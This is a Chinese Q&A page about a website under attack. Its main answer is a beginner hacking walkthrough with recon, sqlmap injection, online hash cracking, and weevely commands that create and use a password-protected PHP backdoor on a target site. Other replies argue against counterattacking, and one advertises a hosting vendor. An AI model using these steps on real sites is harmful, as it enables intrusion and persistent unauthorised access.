网站被攻击:网站一直在被攻击,真想成为黑客,反击他大爷的们?我该怎么办?咚咚子

发布时间:2020-06-01 13:08:38   来源:网络

一篇科普文,很适合小白,长文请静下心看。

通过本文你将了解黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的。阅读本文你会学到以下内容:

1.渗透测试前的简单信息收集。

2.sqlmap的使用

3.nmap的使用

4.nc反弹提权

5.linux系统的权限提升

6.backtrack 5中渗透测试工具nikto和w3af的使用等.

假设黑客要入侵的你的网站域名为:hack-test.com

让我们用ping命令获取网站服务器的IP地址




现在我们获取了网站服务器的IP地址为:173.236.138.113

寻找同一服务器上的其它网站,我们使用sameip.org.



173.236.138.113上有26个网站,很多黑客为了攻破你的网站可能会检查同服务器上的其它网站,但是本次是以研究为目标,我们将抛开服务器上的其它网站,只针对你的网站来进行入侵检测。

我们需要关于你网站的以下信息:

1. DNS records (A, NS, TXT, MX and SOA)

2. Web Server Type (Apache, IIS, Tomcat)

3. Registrar (the company that owns your domain)

4. Your name, address, email and phone

5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)

6. Your server OS (Unix,Linux,Windows,Solaris)

7. Your server open ports to internet (80, 443, 21, etc.)

让我们开始找你网站的DNS记录,我们用who.is来完成这一目标.




我们发现你的DNS记录如下














稍等一会,你将会看到扫描结果.




发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.

hack-test.com/Hackademi%27z%220

我们通过工具发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.

Using sqlmap with –u url

我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes

onlinehashcrack.com/fre




我们用weevely制作一个php小马上传到服务器上.

1.weevely使用选项

root@bt:/pentest/backdoors/web/weevely#./main.py -



2.用weevely创建一个密码为koko的php后门

root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko



接下来上传到服务器之后来使用它

root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhack-test.com/Hackademi -pkoko



测试我们的hax.php后门



完成,撒花!

看到这里你应该有个大致的了解了


当然了,这里边只是给你举个简单的小例子,如果你懂一些这方面的技术,就算是皮毛,都能够做很多事情的

感兴趣的可以跟我来学

更多回复:

知乎网友知乎用户:
远水解不了近渴,找个靠谱的安全解决方案提供商咨询下。

知乎网友匿名用户:
你网站就在那,攻击你就攻击你,你反黑什么?人家用win7+Chrome+vpn+内网IP,你怎么弄?还有搬出知道创于技能表的,哪边凉快哪边呆着去。你最好的方法,还是安装一下狗啊,加cdn能够缓解一大部分。

知乎网友安全头条:

真的要反击吗? 来看看这篇文章吧,里面套路很深的

我被黑客攻击了可以还击吗? 主动网络防御可靠性(ACDC)法案正在激烈辩论中

知乎网友周祥:

可以找个做高防的服务器商。能保证打不死的。 www.landui.com 周祥 18507493779(微信同)


知乎网友说书人:

反击?你怕是想瞎了心了

网站遭受了攻击,我觉得应该是cc这种吧 我这么告诉你,你网站如果不大就让他一直打,反正也是他烧钱